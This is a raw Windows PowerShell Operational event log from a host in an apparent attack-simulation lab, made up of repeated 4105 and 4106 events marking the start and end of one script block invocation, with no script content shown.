LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467970
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467969
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467968
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467967
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467966
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467965
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467964
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467963
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467962
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467961
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467960
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467959
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467958
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467957
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467956
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467955
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467954
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467953
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467952
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467951
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467950
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467949
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467948
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467947
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467946
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467945
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467944
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467943
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467942
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467941
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467940
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467939
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467938
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467937
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467936
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467935
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467934
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467933
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467932
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467931
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467930
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467929
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467928
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467927
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467926
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467925
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467924
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467923
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467922
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467921
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467920
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467919
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467918
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467917
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467916
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:08 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467915
Keywords=None
